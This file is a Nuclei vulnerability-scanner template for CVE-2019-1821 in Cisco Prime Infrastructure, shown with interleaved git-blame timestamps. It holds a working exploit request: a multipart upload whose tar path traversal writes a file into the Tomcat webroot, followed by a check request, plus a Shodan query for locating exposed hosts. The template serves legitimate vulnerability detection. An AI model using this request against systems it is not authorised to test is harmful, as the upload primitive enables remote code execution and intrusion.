nuclei-templates/http/cves/2019/CVE-2019-1821.yaml

58 lines
2.5 KiB
YAML
Raw Normal View History

2021-11-06 15:04:10 +00:00
id: CVE-2019-1821
info:
name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
2021-11-06 15:04:10 +00:00
author: _0xf4n9x_
2021-11-08 07:24:34 +00:00
severity: critical
description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
2021-11-06 15:04:10 +00:00
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
2021-11-06 15:04:10 +00:00
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/153350/Cisco-Prime-Infrastructure-Health-Monitor-TarArchive-Directory-Traversal.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-1821
cwe-id: CWE-20
2023-07-11 19:49:27 +00:00
epss-score: 0.96882
cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"prime infrastructure"
2023-07-11 19:49:27 +00:00
vendor: cisco
product: evolved_programmable_network_manager
2023-07-12 11:56:50 +00:00
tags: packetstorm,cve,cve2019,rce,fileupload,unauth,intrusive,cisco
2021-11-06 15:04:10 +00:00
http:
2021-11-06 15:04:10 +00:00
- raw:
- |
POST /servlet/UploadServlet HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Primary-IP: 127.0.0.1
Filename: test.tar
Filesize: 10240
Compressed-Archive: false
Destination-Dir: tftpRoot
Filecount: 1
Content-Length: 269
Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
--871a4a346a547cf05cb83f57b9ebcb83
Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}
--871a4a346a547cf05cb83f57b9ebcb83--
- |
GET /test.txt HTTP/1.1
Host: {{Host}}
req-condition: true
matchers:
- type: dsl
dsl:
2021-11-13 17:31:53 +00:00
- "status_code == 200"
2021-11-06 15:04:10 +00:00
- "contains((body_2), '{{randstr}}')"
condition: and